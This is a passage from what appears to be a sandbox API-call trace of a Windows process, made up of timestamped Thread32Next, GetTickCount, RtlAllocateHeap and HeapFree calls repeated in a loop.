HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.104] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.104] GetTickCount () returned 0x1134f49 [0148.104] GetCurrentThreadId () returned 0x35c [0148.104] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.104] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.104] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.105] GetTickCount () returned 0x1134f49 [0148.105] GetCurrentThreadId () returned 0x35c [0148.105] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.105] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.105] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.106] GetTickCount () returned 0x1134f49 [0148.106] GetCurrentThreadId () returned 0x35c [0148.106] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.106] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.106] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.106] GetTickCount () returned 0x1134f49 [0148.106] GetCurrentThreadId () returned 0x35c [0148.106] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.106] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.106] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.107] GetTickCount () returned 0x1134f49 [0148.107] GetCurrentThreadId () returned 0x35c [0148.107] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.107] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.107] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.108] GetTickCount () returned 0x1134f49 [0148.108] GetCurrentThreadId () returned 0x35c [0148.108] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.108] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.108] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.108] GetTickCount () returned 0x1134f49 [0148.108] GetCurrentThreadId () returned 0x35c [0148.108] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.108] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.108] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.109] GetTickCount () returned 0x1134f49 [0148.109] GetCurrentThreadId () returned 0x35c [0148.109] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.109] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.109] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.110] GetTickCount () returned 0x1134f49 [0148.110] GetCurrentThreadId () returned 0x35c [0148.110] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.110] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.110] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.110] GetTickCount () returned 0x1134f49 [0148.110] GetCurrentThreadId () returned 0x35c [0148.110] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.110] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.110] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.111] GetTickCount () returned 0x1134f49 [0148.111] GetCurrentThreadId () returned 0x35c [0148.111] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.111] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.111] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.112] GetTickCount () returned 0x1134f49 [0148.112] GetCurrentThreadId () returned 0x35c [0148.112] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.112] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.112] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.112] GetTickCount () returned 0x1134f49 [0148.112] GetCurrentThreadId () returned 0x35c [0148.112] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.112] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.112] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.113] GetTickCount () returned 0x1134f49 [0148.113] GetCurrentThreadId () returned 0x35c [0148.113] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.113] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.113] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.114] GetTickCount () returned 0x1134f49 [0148.114] GetCurrentThreadId () returned 0x35c [0148.114] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.114] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.114] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.114] GetTickCount () returned 0x1134f49 [0148.114] GetCurrentThreadId () returned 0x35c [0148.114] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.114] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.115] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.115] GetTickCount () returned 0x1134f49 [0148.115] GetCurrentThreadId () returned 0x35c [0148.115] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.115] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.115] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.116] GetTickCount () returned 0x1134f49 [0148.116] GetCurrentThreadId () returned 0x35c [0148.116] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.116] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.116] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.116] GetTickCount () returned 0x1134f49 [0148.116] GetCurrentThreadId () returned 0x35c [0148.117] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.117] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.117] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.117] GetTickCount () returned 0x1134f49 [0148.117] GetCurrentThreadId () returned 0x35c [0148.117] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.117] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.117] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.118] GetTickCount () returned 0x1134f59 [0148.118] GetCurrentThreadId () returned 0x35c [0148.118] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.118] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.118] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.119] GetTickCount () returned 0x1134f59 [0148.119] GetCurrentThreadId () returned 0x35c [0148.119] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.119] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.119] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.119] GetTickCount () returned 0x1134f59 [0148.119] GetCurrentThreadId () returned 0x35c [0148.119] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.119] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.119] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.120] GetTickCount () returned 0x1134f59 [0148.120] GetCurrentThreadId () returned 0x35c [0148.120] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.120] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.120] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.121] GetTickCount () returned 0x1134f59 [0148.121] GetCurrentThreadId () returned 0x35c [0148.121] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.121] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.121] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.121] GetTickCount () returned 0x1134f59 [0148.121] GetCurrentThreadId () returned 0x35c [0148.121] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.121] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.121] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.122] GetTickCount () returned 0x1134f59 [0148.122] GetCurrentThreadId () returned 0x35c [0148.122] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.122] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.122] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.123] GetTickCount () returned 0x1134f59 [0148.123] GetCurrentThreadId () returned 0x35c [0148.123] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.123] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.123] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.123] GetTickCount () returned 0x1134f59 [0148.123] GetCurrentThreadId () returned 0x35c [0148.123] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.123] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.123] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.124] GetTickCount () returned 0x1134f59 [0148.124] GetCurrentThreadId () returned 0x35c [0148.124] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.124] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.124] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.125] GetTickCount () returned 0x1134f59 [0148.125] GetCurrentThreadId () returned 0x35c [0148.125] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.125] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.125] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.125] GetTickCount () returned 0x1134f59 [0148.125] GetCurrentThreadId () returned 0x35c [0148.125] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.125] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.125] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.126] GetTickCount () returned 0x1134f59 [0148.126] GetCurrentThreadId () returned 0x35c [0148.126] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.126] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.126] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.127] GetTickCount () returned 0x1134f59 [0148.127] GetCurrentThreadId () returned 0x35c [0148.127] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.127] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.127] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.127] GetTickCount () returned 0x1134f59 [0148.127] GetCurrentThreadId () returned 0x35c [0148.127] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.127] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.127] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.128] GetTickCount () returned 0x1134f59 [0148.128] GetCurrentThreadId () returned 0x35c [0148.128] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.128] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.128] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.129] GetTickCount () returned 0x1134f59 [0148.129] GetCurrentThreadId () returned 0x35c [0148.129] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.129] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.129] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.129] GetTickCount () returned 0x1134f59 [0148.129] GetCurrentThreadId () returned 0x35c [0148.129] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.129] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.130] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.130] GetTickCount () returned 0x1134f59 [0148.130] GetCurrentThreadId () returned 0x35c [0148.130] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.130] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.130] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.131] GetTickCount () returned 0x1134f59 [0148.131] GetCurrentThreadId () returned 0x35c [0148.131] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.131] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.131] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.131] GetTickCount () returned 0x1134f59 [0148.131] GetCurrentThreadId () returned 0x35c [0148.132] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.132] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.132] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.132] GetTickCount () returned 0x1134f59 [0148.132] GetCurrentThreadId () returned 0x35c [0148.132] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.132] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.132] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.133] GetTickCount () returned 0x1134f59 [0148.133] GetCurrentThreadId () returned 0x35c [0148.133] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.133] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.133] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.134] GetTickCount () returned 0x1134f68 [0148.134] GetCurrentThreadId () returned 0x35c [0148.134] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.134] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.134] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.135] GetTickCount () returned 0x1134f68 [0148.135] GetCurrentThreadId () returned 0x35c [0148.135] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.135] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.135] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.136] GetTickCount () returned 0x1134f68 [0148.136] GetCurrentThreadId () returned 0x35c [0148.136] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.136] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.136] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.136] GetTickCount () returned 0x1134f68 [0148.136] GetCurrentThreadId () returned 0x35c [0148.136] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.136] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.136] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.137] GetTickCount () returned 0x1134f68 [0148.137] GetCurrentThreadId () returned 0x35c [0148.137] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.137] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.137] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.137] GetTickCount () returned 0x1134f68 [0148.138] GetCurrentThreadId () returned 0x35c [0148.138] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.138] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.138] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.138] GetTickCount () returned 0x1134f68 [0148.138] GetCurrentThreadId () returned 0x35c [0148.138] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.138] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.138] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.139] GetTickCount () returned 0x1134f68 [0148.139] GetCurrentThreadId () returned 0x35c [0148.139] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.139] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.139] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.139] GetTickCount () returned 0x1134f68 [0148.139] GetCurrentThreadId () returned 0x35c [0148.139] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.139] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.139] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.140] GetTickCount () returned 0x1134f68 [0148.140] GetCurrentThreadId () returned 0x35c [0148.140] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.140] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.140] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.141] GetTickCount () returned 0x1134f68 [0148.141] GetCurrentThreadId () returned 0x35c [0148.141] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.141] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.141] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.141] GetTickCount () returned 0x1134f68 [0148.141] GetCurrentThreadId () returned 0x35c [0148.141] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.141] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.141] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.142] GetTickCount () returned 0x1134f68 [0148.142] GetCurrentThreadId () returned 0x35c [0148.142] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.142] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.142] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.143] GetTickCount () returned 0x1134f68 [0148.143] GetCurrentThreadId () returned 0x35c [0148.143] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.143] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.143] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.143] GetTickCount () returned 0x1134f68 [0148.143] GetCurrentThreadId () returned 0x35c [0148.143] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.143] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.143] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.144] GetTickCount () returned 0x1134f68 [0148.144] GetCurrentThreadId () returned 0x35c [0148.144] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.144] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.144] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.144] GetTickCount () returned 0x1134f68 [0148.144] GetCurrentThreadId () returned 0x35c [0148.145] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.145] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.145] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.145] GetTickCount () returned 0x1134f68 [0148.145] GetCurrentThreadId () returned 0x35c [0148.145] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.145] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.145] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.146] GetTickCount () returned 0x1134f68 [0148.146] GetCurrentThreadId () returned 0x35c [0148.146] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.146] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.146] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.146] GetTickCount () returned 0x1134f68 [0148.146] GetCurrentThreadId () returned 0x35c [0148.146] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.146] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.146] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.147] GetTickCount () returned 0x1134f68 [0148.147] GetCurrentThreadId () returned 0x35c [0148.147] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.147] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.147] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.148] GetTickCount () returned 0x1134f68 [0148.148] GetCurrentThreadId () returned 0x35c [0148.148] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.148] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.148] GetTickCount () returned 0x1134f68 [0148.148] GetCurrentThreadId () returned 0x35c [0148.148] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.148] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.149] GetTickCount () returned 0x1134f78 [0148.149] GetCurrentThreadId () returned 0x35c [0148.149] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.149] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.150] GetTickCount () returned 0x1134f78 [0148.150] GetCurrentThreadId () returned 0x35c [0148.150] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.150] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.150] GetTickCount () returned 0x1134f78 [0148.150] GetCurrentThreadId () returned 0x35c [0148.150] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.150] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.151] GetTickCount () returned 0x1134f78 [0148.151] GetCurrentThreadId () returned 0x35c [0148.151] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.151] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.151] GetTickCount () returned 0x1134f78 [0148.152] GetCurrentThreadId () returned 0x35c [0148.152] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.152] Thread32Next (hSnapshot=0x630, 